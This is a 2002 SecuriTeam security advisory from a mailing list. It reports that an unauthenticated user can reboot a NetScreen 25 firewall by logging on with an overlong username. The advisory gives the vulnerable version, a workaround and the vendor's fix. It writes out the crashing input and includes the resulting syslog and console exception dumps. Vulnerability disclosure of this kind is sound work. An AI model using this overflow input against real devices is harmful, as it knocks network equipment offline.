[NEWS] NetScreen 25 Unauthorized User Reboot (DoS)

From: support@securiteam.com
Date: 05/27/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 27 May 2002 20:22:43 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  NetScreen 25 Unauthorized User Reboot (DoS)
------------------------------------------------------------------------

SUMMARY

A remote user (an unauthenticated user) can cause a
<http://www.netscreen.com/products/index.html> NetScreen 25 to remotely
reboot. Repeating this attack would effectively cause a denial of service
attack against the product.

DETAILS

Vulnerable systems:
 * NetScreen 25 version 3.0.1r1.1

Workaround:
Restrict the IP's that can connect to the web interface and upgrade to the
latest version of screen OS.

Vendor status:
The vendor has already fixed this issue, please upgrade to the latest
version.

Exploit:
Log on to the NetScreen with a user name of:
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
Would cause the device to reboot.

Syslog output:
Remote syslog shows just that the device's interfaces came back up:
May 24 14:36:59 192.168.1.100 phaedra: NetScreen device_id=phaedra
system-notification-00513: The physical state of the interface trust has
changed to Up (2002-05-24 13:36:47)
 May 24 14:36:59 192.168.1.100 phaedra: NetScreen device_id=phaedra
system-notification-00513: The physical state of the interface untrust has
changed to Up (2002-05-24 13:36:47)
 May 24 14:36:59 192.168.1.100 phaedra: NetScreen device_id=phaedra
system-notification-00513: The physical state of the interface DMZ has
changed to Up (2002-05-24 13:36:48)

Console output
phaedra->
*******************************************************
                Exception Dump
*******************************************************
System up time: 3 hours 20 minutes 48 seconds
Exception(Instruction TLB Miss)
GPR:
R0: 78787878 R1: 03044e50 R2: 00470928 R3: 00000000
R4: 03044e08 R5: 000000ac R6: 0074bde8 R7: 78787878
R8: 004c9d70 R9: 03a81d50 R10: 004fcb58 R11: 004d0000
R12: 40000024 R13: 004d1344 R14: 000d0904 R15: 80020020
R16: 43c00da1 R17: 300b6030 R18: 60101022 R19: 00000000
R20: 00750000 R21: 00470000 R22: 00000001 R23: 00755078
R24: 78787878 R25: 78787878 R26: 78787878 R27: 78787878
R28: 78787878 R29: 78787878 R30: 78787878 R31: 78787878
Special Register:
CR: 20000024 XER: 00000000 LR: 78787878 CTR: 00000000
MSR: 00021200 SRR0: 78787878 SRR1: 00029230 SRR2: 00300044
SRR3: 00000000 DBSR: 00000000 TCR: fc000000 TSR: 04000000
ESR: 00000000 DEAR: 00000000 PID: 00000000
*******************************************************
                Exception Dump
*******************************************************
System up time: 3 hours 20 minutes 48 seconds
Exception(Machine Check)
GPR:
R0: 78787878 R1: 03044d68 R2: 00470928 R3: 00000000
R4: 00000000 R5: 00000000 R6: 78787878 R7: 002fffd4
R8: 004c9d70 R9: 00000000 R10: 000002ec R11: 00000020
R12: 40000024 R13: 004d1344 R14: 000d0904 R15: 80020020
R16: 43c00da1 R17: 300b6030 R18: 60101022 R19: 00000000
R20: 00750000 R21: 00470000 R22: 00000001 R23: 00755078
R24: 78787878 R25: 78787878 R26: 78787878 R27: 00000001
R28: 03044d94 R29: 0000001f R30: 78787878 R31: 00000000
Special Register:
CR: 40000024 XER: 20000000 LR: 002fffd4 CTR: 00000000
MSR: 00000000 SRR0: 78787878 SRR1: 00029230 SRR2: 00300044
SRR3: 00021200 DBSR: 00000000 TCR: fc000000 TSR: 0c000000
ESR: 00000000 DEAR: 00000000 PID: 00000000
Trace Dump:
00300044 002fffd4 002ff8f4 002fee04 00000000
System Level:
Image In Interrupt Level
********************************************************
        Please use GDB to track the trace
********************************************************

NetScreen PowerPC 405GP BootROM V1.01 (c)1997-2002 NetScreen Technologies
Inc. All rights reserved

Check Platform...... NS-25

ADDITIONAL INFORMATION

The information has been provided by <mailto:quentyn@fotango.com>
quentyn.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages